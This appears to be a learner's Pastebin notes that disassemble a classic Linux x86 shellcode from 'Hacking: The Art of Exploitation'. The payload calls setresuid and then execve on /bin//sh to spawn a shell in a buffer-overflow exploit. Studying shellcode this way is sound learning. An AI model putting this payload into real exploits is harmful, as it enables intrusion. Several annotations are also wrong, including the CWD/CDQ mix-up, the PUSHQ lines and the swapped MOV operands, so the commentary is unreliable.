Data hosted with ♥ by Pastebin.com - Download Raw - See Original
  1. /*register ids:
  2.   eax = 0 = 000
  3.   ecx = 1 = 001
  4.   edx = 2 = 010
  5.   ebx = 3 = 011
  6.   esp = 4 = 100
  7.   ebp = 5 = 101
  8.   esi = 6 = 110
  9.   edi = 7 = 111*/
  10.  
  11. shellcode: \x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89\xe1\xcd\x80
  12.  
  13. from "Hacking - The Art of Exploitation", in source file "exploit_notesearch.c". This is used in a buffer overflow to spawn a shell.
  14.  
  15. OPCODE              MNEMO   SRC DEST
  16.  
  17. \x31 \xc0           XOR     %eax,   %eax        ;clearing all registers
  18. \x31 \xdb           XOR     %ebx,   %ebx
  19. \x31 \xc9           XOR     %ecx,   %ecx
  20. \x99                CWD     %ax,    %dx         ;convert word to doubleword / doubleword to quadword
  21. \xb0 \xa4           MOV     $0xa4,  %al
  22. \xcd \x80           INT     $0x80           ;call to interrupt procedure
  23. \x6a \x0b           PUSH    $0xb            ;push 0xb onto stack (8bit)
  24. \x58                POP     %eax            ;opcodes 58+r (r->register id)
  25. \x51                PUSH    %ecx            ;push word/doubleword onto stack. (opcode is listed as 50+r)
  26. \x68 \x2f \x2f \x73 \x68    PUSHQ   $0x68732f2f
  27. \x68 \x2f \x62 \x69 \x6e    PUSHQ   $0x6e69622f
  28. \x89 \xe3           MOV %ebx, %esp
  29. \x51                PUSH    %ecx
  30. \x89 \xe2           MOV %edx, %esp
  31. \x53                PUSH    %ebx
  32. \x89 \xe1           MOV %ecx, %esp
  33. \xcd \x80           INT $0x80           ;interrupt again
  34.  
  35. //still don't know what the fuck this does